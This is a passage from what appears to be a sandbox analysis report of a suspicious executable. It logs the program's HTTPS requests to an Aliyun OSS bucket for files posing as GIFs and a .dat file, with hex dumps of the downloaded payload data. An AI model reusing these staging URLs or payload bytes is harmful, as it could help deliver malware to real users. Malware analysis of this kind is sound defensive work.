                                                  2025-01-06 03:50:41 UTC4096INData Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2
                                                  Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                                  2025-01-06 03:50:41 UTC4096INData Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d
                                                  Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                                  2025-01-06 03:50:41 UTC4096INData Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8
                                                  Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                                  2025-01-06 03:50:41 UTC4096INData Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf
                                                  Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJ


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.64995339.103.20.264433916C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-06 03:50:42 UTC111OUTGET /c.gif HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-06 03:50:42 UTC546INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Mon, 06 Jan 2025 03:50:42 GMT
                                                  Content-Type: image/gif
                                                  Content-Length: 10681
                                                  Connection: close
                                                  x-oss-request-id: 677B5312E80D0139373F8B84
                                                  Accept-Ranges: bytes
                                                  ETag: "10A818386411EE834D99AE6B7B68BE71"
                                                  Last-Modified: Sun, 05 Jan 2025 09:00:14 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 10287299869673359293
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000104
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                                  x-oss-server-time: 22
                                                  2025-01-06 03:50:42 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                  2025-01-06 03:50:42 UTC4096INData Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66
                                                  Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
                                                  2025-01-06 03:50:42 UTC3035INData Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0
                                                  Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.64996239.103.20.264433916C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-06 03:50:44 UTC111OUTGET /d.gif HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-06 03:50:44 UTC546INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Mon, 06 Jan 2025 03:50:44 GMT
                                                  Content-Type: image/gif
                                                  Content-Length: 3892010
                                                  Connection: close
                                                  x-oss-request-id: 677B53140BFF4B3932AC0B01
                                                  Accept-Ranges: bytes
                                                  ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                                  Last-Modified: Sun, 05 Jan 2025 09:00:25 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 3363616613234190325
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000104
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                                  x-oss-server-time: 5
                                                  2025-01-06 03:50:44 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                  2025-01-06 03:50:44 UTC4096INData Raw: 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 6f
                                                  Data Ascii: ;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|o
                                                  2025-01-06 03:50:44 UTC4096INData Raw: a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f 11
                                                  Data Ascii: V(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                  2025-01-06 03:50:44 UTC4096INData Raw: 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95 97
                                                  Data Ascii: -J;wuwu{}uG`uWu{Q6
                                                  2025-01-06 03:50:44 UTC4096INData Raw: 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33 79
                                                  Data Ascii: w#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3y
                                                  2025-01-06 03:50:44 UTC4096INData Raw: fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50 85
                                                  Data Ascii: eE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                                                  2025-01-06 03:50:44 UTC4096INData Raw: 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79 a3
                                                  Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                                  2025-01-06 03:50:44 UTC4096INData Raw: 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4 af
                                                  Data Ascii: e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                                  2025-01-06 03:50:44 UTC4096INData Raw: d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7 5f
                                                  Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z_
                                                  2025-01-06 03:50:44 UTC4096INData Raw: 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64 96
                                                  Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.64998839.103.20.264433916C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-06 03:50:52 UTC111OUTGET /s.dat HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-06 03:50:52 UTC561INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Mon, 06 Jan 2025 03:50:52 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 28272
                                                  Connection: close
                                                  x-oss-request-id: 677B531CDCC23B3432E801EC
                                                  Accept-Ranges: bytes
                                                  ETag: "118BC88C54125F7AD49C190766A982DD"
                                                  Last-Modified: Mon, 06 Jan 2025 03:50:50 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 15066663303643123465
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000113
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: EYvIjFQSX3rUnBkHZqmC3Q==
                                                  x-oss-server-time: 12
